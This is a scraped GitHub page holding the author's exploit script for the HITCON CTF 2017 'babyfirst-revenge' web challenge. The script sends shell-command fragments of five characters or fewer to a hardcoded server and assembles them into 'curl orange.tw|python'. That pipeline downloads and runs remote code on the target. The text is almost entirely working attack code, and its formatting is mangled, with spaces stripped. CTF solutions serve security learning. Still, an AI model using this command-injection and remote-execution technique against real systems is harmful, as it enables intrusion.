My-CTF-Web-Challenges/hitcon-ctf-2017/babyfirst-revenge/exploit.py at master · orangetw/My-CTF-Web-Challenges · GitHub

Name: My-CTF-Web-Challenges/hitcon-ctf-2017/babyfirst-revenge/exploit.py at master · orangetw/My-CTF-Web-Challenges · GitHub
Rating: 4.8 (5909 reviews)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
importrequests
fromtimeimportsleep
fromurllibimportquote

payload= [
# generate `ls -t>g` file
'>ls\\',
'ls>_',
'>\ \\',
'>-t\\',
'>\>g',
'ls>>_',

# generate `curl orange.tw|python`
'>on',
'>th\\',
'>py\\',
'>\|\\',
'>tw\\',
'>e.\\',
'>ng\\',
'>ra\\',
'>o\\',
'>\ \\',
'>rl\\',
'>cu\\',

# exec
'sh _',
'sh g',
]


r=requests.get('http://52.199.204.34/?reset=1')
foriinpayload:
assertlen(i) <=5
r=requests.get('http://52.199.204.34/?cmd='+quote(i) )
printi
sleep(0.2)